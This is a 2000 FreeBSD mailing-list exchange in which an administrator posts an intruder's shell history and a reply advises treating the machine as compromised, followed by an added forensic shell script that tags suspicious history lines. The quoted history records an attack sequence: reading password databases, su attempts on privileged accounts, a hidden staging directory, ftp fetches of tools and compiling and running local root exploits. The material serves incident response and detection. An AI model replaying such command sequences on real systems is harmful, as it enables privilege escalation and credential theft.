Date:      Mon, 18 Dec 2000 15:47:32 -0500 (EST)
From:      Tim McMillen <timcm@umich.edu>
To:        "Gerald T. Freymann" <freymann@eagle.ca>
Cc:        Questions <questions@FreeBSD.ORG>
Subject:   Re: Hacker history file - OUCH
Message-ID:  <Pine.SOL.4.10.10012181521360.17224-100000@tempest.gpcc.itd.umich.edu>
In-Reply-To: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>

	Do you know for sure it was an intruder?  Or was it just one of
your users?  Either way that doesn't look good.  I'm no security expert,
but the programs they compiled and ran could easily be backdoors to get in
easily the next time.  It's hard (for me) to tell how bad it is without
knowing whether they were successful in getting root privileges.  In the
history file we don't see the output of the command.  Nothing he did
afterwards seems to require root privileges, but if he had them then
those programs could easily be backdoors.  I would consider the box
compromised.  Is it still in use?  The best way to get the most
information about an attack is to shut down and halt the machine ASAP.
Then mount everything read-only (perhaps on another machine).  Then look
around.  That way you won't overwrite possible clues.  Any disk access
after the intruder is there can overwrite that, and that is bad for
evidence.
	You may want to contact the administrators at the sites he ftp'd
to to alert them and see if they can tell what those files were that he
downloaded.  
	
						Tim

On Mon, 18 Dec 2000, Gerald T. Freymann wrote:

> 
> 
> Seems we have an intruder on one of our boxes... the .history file from the
> troubled account follows:
> 
> cd bnc
> ls
> ./bash
> who
> cd /etc
> more passwd
> ps -l
> ls -l
> more pwd.db
> more hosts
> pico adduser.conf.bak
> pico group
> su user
> pico group.bak
> pico ftpuser
> O
> pico ftpusers
> su toor
> su operator
> id
> pico spwd.db
> su wheel
> pico passwd
> cd /var/tmp
> ls -a
> cd ...
> ls -a
> cd ..
> ls -l
> ls -al
> cd ...
> ftp copper.he.net
> chmod u+x xcon
> ./xcon
> id
> rm *
> ls
> who
> cd /var/tmp
> ls -a
> ls -al
> cd ...
> ls -a
> ftp cih.edu.mx
> ls
> cc bsd1 bsd-cron.c
> cc -o bsd1 bsd-cron.c
> ./bsd1
> id
> cc -o bsd2 bsd2.c
> ./bsd2
> id
> ls
> ftp cih.edu.mx
> ./bsd sh
> ./bsd.sh
> chmod u+x bsd.sh
> ./bsd.sh
> /tmp/sh
> id
> ls
> cc -o bsdsmail bsdsmail.c
> ./bsdsmail
> ls -a
> pico hack
> ls
> pico user.inf
> ls
> id
> rm *
> exit
> 
>  Anybody recognize what the intruder has set up?
> 
> -Gerry
> 
> 
> 
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
> 




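The reply above has to reason from a bare .history file with no command output, so the tells are the pattern of commands: reading the password databases, su attempts against privileged accounts, a hidden "..." directory under /var/tmp, ftp fetches, compile-and-run of local binaries with an "id" after each one to see whether it gave root, and a final "rm *" to clean up. The script below is an added example written for this archive page, not code from either poster; it tags a history line by line with that pattern and counts the run-then-id cycles. The tag names are this example's own heuristic, and the embedded history is a constructed subset of the commands quoted in the thread.

```shell
#!/bin/sh
# Triage a captured shell history for the tradecraft seen in the thread.
# Added example for this archive page, not code from the original thread.
# The embedded history is constructed from the commands quoted above.

# Classify one history line; prints a tag, or "-" for an uninteresting line.
classify_cmd() {
    case "$1" in
        "more passwd"|"more master.passwd"|"more pwd.db"|"more spwd.db"|"more group"|"more hosts")
            printf 'RECON\n' ;;                      # reading the auth databases
        "pico "*|"vi "*|"ee "*)
            case "${1#* }" in                        # argument after the editor name
                passwd|master.passwd|pwd.db|spwd.db|group|group.bak|ftpusers|/etc/*)
                    printf 'EDIT_AUTHDB\n' ;;        # editing passwd/group/ftpusers
                *)  printf 'EDIT_FILE\n' ;;
            esac ;;
        "su "*)                       printf 'SU_ATTEMPT\n' ;;   # trying other accounts
        id|"id "*)                    printf 'PRIV_CHECK\n' ;;   # "did that give me root?"
        "cd /var/tmp"*|"cd /tmp"*)    printf 'STAGING\n' ;;      # world-writable work dir
        "cd ..."*)                    printf 'HIDDEN_DIR\n' ;;   # "..." hides from casual ls
        "ftp "*)                      printf 'FETCH\n' ;;        # pulling tools from outside
        "chmod u+x "*|"chmod +x "*|"chmod 7"*) printf 'MAKE_EXEC\n' ;;
        "cc "*|"gcc "*|"make"*)       printf 'COMPILE\n' ;;      # building exploits locally
        "./"*|"/tmp/"*|"/var/tmp/"*)  printf 'RUN_LOCAL\n' ;;    # running a fresh binary
        "rm *"|"rm -rf "*|"rm -f "*)  printf 'WIPE\n' ;;         # cleaning up
        *)                            printf '%s\n' - ;;
    esac
}

# Read a history on stdin and print "line-no  tag  command" for every line.
# Untagged lines are kept (as "-") so the order of events is preserved.
triage_history() {
    n=0
    while IFS= read -r cmd || [ -n "$cmd" ]; do
        n=$((n + 1))
        printf '%4d  %-12s %s\n' "$n" "$(classify_cmd "$cmd")" "$cmd"
    done
}

# Count lines carrying a given tag in triage output read from stdin.
count_tag() {
    awk -v t="$1" '$2 == t { n++ } END { print n + 0 }'
}

# Count RUN_LOCAL immediately followed by PRIV_CHECK: each one is a freshly
# fetched or compiled program being tried as a privilege-escalation exploit.
exploit_test_cycles() {
    awk 'prev == "RUN_LOCAL" && $2 == "PRIV_CHECK" { n++ } { prev = $2 }
         END { print n + 0 }'
}

# Constructed sample history (a subset of the commands quoted in the thread).
sample_history() {
    cat <<'EOF'
cd /etc
more passwd
more pwd.db
ps -l
pico group
su toor
su operator
id
pico passwd
cd /var/tmp
ls -a
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
id
cc -o bsd1 bsd-cron.c
./bsd1
id
cc -o bsd2 bsd2.c
./bsd2
id
/tmp/sh
id
rm *
exit
EOF
}

# Demo: annotate the sample and report how many exploit attempts it contains.
sample_history | triage_history
printf 'run-then-id cycles: %s\n' "$(sample_history | triage_history | exploit_test_cycles)"
```

Run it as `sh triage.sh` against the embedded sample, or replace `sample_history` with `cat /home/user/.history` on a copy of the disk mounted read-only; the point of keeping untagged lines in the output is that the run-then-id adjacency check only works when nothing is dropped between events.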